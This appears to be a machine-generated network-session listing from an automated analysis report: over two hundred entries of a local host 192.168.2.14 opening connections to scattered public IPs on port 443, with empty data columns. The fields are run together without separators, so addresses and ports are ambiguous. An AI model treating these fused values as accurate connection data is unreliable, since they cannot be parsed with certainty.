                                                        16578192.168.2.143623673.234.108.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16579192.168.2.1449196204.134.147.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16580192.168.2.145628840.39.164.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16581192.168.2.1452554203.227.92.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16582192.168.2.1449912142.236.171.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16583192.168.2.1459020204.204.224.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16584192.168.2.144180240.253.119.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16585192.168.2.145829491.200.77.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16586192.168.2.14358049.223.150.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16587192.168.2.1447260135.139.172.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16588192.168.2.146035027.229.240.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16589192.168.2.1447642189.27.138.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16590192.168.2.14505469.208.136.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16591192.168.2.1437318187.233.251.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16592192.168.2.1446336113.15.228.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16593192.168.2.1458854135.134.191.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16594192.168.2.1450128159.58.67.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16595192.168.2.1434348157.114.137.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16596192.168.2.144507284.14.53.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16597192.168.2.1453070112.15.157.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16598192.168.2.1460664178.201.15.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16599192.168.2.145367864.177.182.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16600192.168.2.1433204203.6.180.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16601192.168.2.144118617.20.34.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16602192.168.2.14408342.57.171.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16603192.168.2.1456972168.141.172.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16604192.168.2.145097878.123.126.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16605192.168.2.144775459.83.94.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16606192.168.2.1435224113.125.30.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16607192.168.2.145083220.241.254.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16608192.168.2.1453710191.173.147.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16609192.168.2.145813089.166.182.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16610192.168.2.145749254.100.77.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16611192.168.2.1440252209.31.217.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16612192.168.2.144601872.45.209.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16613192.168.2.1455374119.61.156.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16614192.168.2.144497278.222.246.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16615192.168.2.1441372133.251.173.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16616192.168.2.1452950190.225.165.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16617192.168.2.1442822218.26.107.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16618192.168.2.1447236202.54.8.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16619192.168.2.144285441.168.173.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16620192.168.2.144915025.151.69.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16621192.168.2.144263870.135.163.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16622192.168.2.1452872163.130.212.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16623192.168.2.1437304212.108.253.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16624192.168.2.144219070.229.184.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16625192.168.2.143911219.219.44.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16626192.168.2.1445582166.152.6.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16627192.168.2.1435658164.2.171.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16628192.168.2.1444596219.51.34.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16629192.168.2.144613497.156.246.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16630192.168.2.143417431.219.90.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16631192.168.2.1458404136.36.205.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16632192.168.2.1450124157.255.37.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16633192.168.2.145142051.177.200.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16634192.168.2.1456688130.86.185.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16635192.168.2.145303879.59.86.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16636192.168.2.1441240110.9.36.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16637192.168.2.1456456130.238.107.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16638192.168.2.145324032.170.41.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16639192.168.2.144240479.87.245.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16640192.168.2.1453468222.171.157.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16641192.168.2.1451108157.204.191.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16642192.168.2.1459410123.66.73.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16643192.168.2.1456534114.205.8.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16644192.168.2.1458800145.28.206.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16645192.168.2.144542886.186.52.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16646192.168.2.145728845.100.22.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16647192.168.2.1458058194.109.135.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16648192.168.2.1457090193.114.17.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16649192.168.2.1441442206.99.207.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16650192.168.2.1457508181.235.50.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16651192.168.2.1439450169.87.37.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16652192.168.2.14339105.219.218.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16653192.168.2.1459328218.177.229.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16654192.168.2.1435362207.145.77.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16655192.168.2.145562439.100.66.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16656192.168.2.14445309.151.145.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16657192.168.2.143381896.188.127.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16658192.168.2.1451002167.180.24.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16659192.168.2.1458244136.88.214.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16660192.168.2.1433088212.244.235.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16661192.168.2.146030627.194.56.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16662192.168.2.14411542.73.63.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16663192.168.2.1440420109.156.109.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16664192.168.2.145734637.223.66.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16665192.168.2.144246268.161.237.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16666192.168.2.1438142173.174.199.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16667192.168.2.1435052174.127.251.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16668192.168.2.1435342189.217.112.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16669192.168.2.1442246104.114.10.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16670192.168.2.143429268.112.139.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16671192.168.2.144726231.1.197.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16672192.168.2.144695299.92.188.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16673192.168.2.1435822125.92.160.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16674192.168.2.143534247.43.187.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16675192.168.2.1433634141.39.192.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16676192.168.2.1452494190.155.221.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16677192.168.2.144926254.28.155.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16678192.168.2.14454085.198.5.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16679192.168.2.1443076101.53.226.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16680192.168.2.1453480209.74.158.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16681192.168.2.1457254190.74.134.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16682192.168.2.1445330198.95.117.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16683192.168.2.1446034155.75.220.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16684192.168.2.146075212.149.77.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16685192.168.2.1442306222.35.108.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16686192.168.2.1446338190.69.211.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16687192.168.2.143557613.44.124.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16688192.168.2.144430048.240.187.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16689192.168.2.14442909.30.174.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16690192.168.2.1458832116.227.188.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16691192.168.2.1454784198.205.4.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16692192.168.2.1450340140.111.127.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16693192.168.2.14466109.186.64.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16694192.168.2.145334613.228.122.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16695192.168.2.1449562134.75.87.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16696192.168.2.1450532134.53.71.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16697192.168.2.1460802208.163.61.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16698192.168.2.1435952176.23.205.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16699192.168.2.1459438146.159.103.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16700192.168.2.145774278.0.73.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16701192.168.2.1446998146.105.207.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16702192.168.2.1452850168.21.248.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16703192.168.2.144047699.7.216.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16704192.168.2.1460254208.102.146.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16705192.168.2.145074038.247.0.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16706192.168.2.144249278.186.6.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16707192.168.2.1435614150.184.80.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16708192.168.2.145405840.201.213.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16709192.168.2.1453242138.168.39.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16710192.168.2.144107045.17.99.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16711192.168.2.1445324101.220.70.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16712192.168.2.1450850179.137.164.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16713192.168.2.144131665.157.182.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16714192.168.2.145178298.213.83.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16715192.168.2.146073034.105.149.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16716192.168.2.145592081.139.172.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16717192.168.2.145912085.116.105.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16718192.168.2.1459184150.140.65.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16719192.168.2.1434234180.203.217.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16720192.168.2.143803432.238.44.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16721192.168.2.1438406148.31.208.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16722192.168.2.143607682.125.54.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16723192.168.2.1445692134.72.47.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16724192.168.2.1442040131.149.130.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16725192.168.2.144475890.177.31.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16726192.168.2.1448450216.180.153.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16727192.168.2.14421462.239.61.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16728192.168.2.145542247.145.58.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16729192.168.2.143828038.152.20.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16730192.168.2.145938276.84.28.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16731192.168.2.1451156108.86.124.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16732192.168.2.1445750183.172.224.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16733192.168.2.1458966213.94.131.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16734192.168.2.144795257.1.235.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16735192.168.2.144914258.41.38.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16736192.168.2.1435060213.7.171.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16737192.168.2.1458586166.0.49.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16738192.168.2.145566653.228.10.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16739192.168.2.144978435.219.75.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16740192.168.2.1455502169.66.77.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16741192.168.2.1451172184.34.28.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16742192.168.2.1459312218.42.160.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16743192.168.2.144197883.148.153.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16744192.168.2.143349431.233.94.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16745192.168.2.1457664201.220.85.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16746192.168.2.144015293.1.155.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16747192.168.2.143360090.190.99.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16748192.168.2.1433714197.168.165.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16749192.168.2.1455106128.166.65.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16750192.168.2.144869298.67.240.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16751192.168.2.1438162182.247.20.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16752192.168.2.1441618123.173.153.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16753192.168.2.1449272181.5.69.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16754192.168.2.145102074.182.101.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16755192.168.2.1441842142.53.237.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16756192.168.2.144210854.82.204.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16757192.168.2.1455588111.169.78.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16758192.168.2.1452762167.22.115.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16759192.168.2.1447184124.43.255.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16760192.168.2.144163238.248.186.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16761192.168.2.143660891.102.124.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16762192.168.2.143507288.77.80.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16763192.168.2.1435988207.52.178.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16764192.168.2.1457638186.50.188.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16765192.168.2.1444332117.15.118.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16766192.168.2.144266849.152.128.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16767192.168.2.1452972153.245.190.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16768192.168.2.1450868152.152.22.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16769192.168.2.1436730183.191.47.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16770192.168.2.145961259.6.235.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16771192.168.2.1448624221.28.154.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16772192.168.2.144809632.113.27.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16773192.168.2.1434080183.233.104.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16774192.168.2.1435524158.217.181.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16775192.168.2.145797079.218.179.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16776192.168.2.143920843.102.121.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16777192.168.2.145663087.71.147.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16778192.168.2.14495164.95.177.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16779192.168.2.143863857.53.125.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16780192.168.2.1458628140.20.130.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16781192.168.2.1452412202.48.204.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16782192.168.2.1453720154.179.252.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16783192.168.2.145102487.229.144.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16784192.168.2.143427444.50.143.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16785192.168.2.1435628134.7.123.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16786192.168.2.143822471.35.169.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16787192.168.2.1442238181.48.190.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16788192.168.2.1452876131.72.225.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16789192.168.2.14504728.130.83.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16790192.168.2.1438910122.194.57.48443
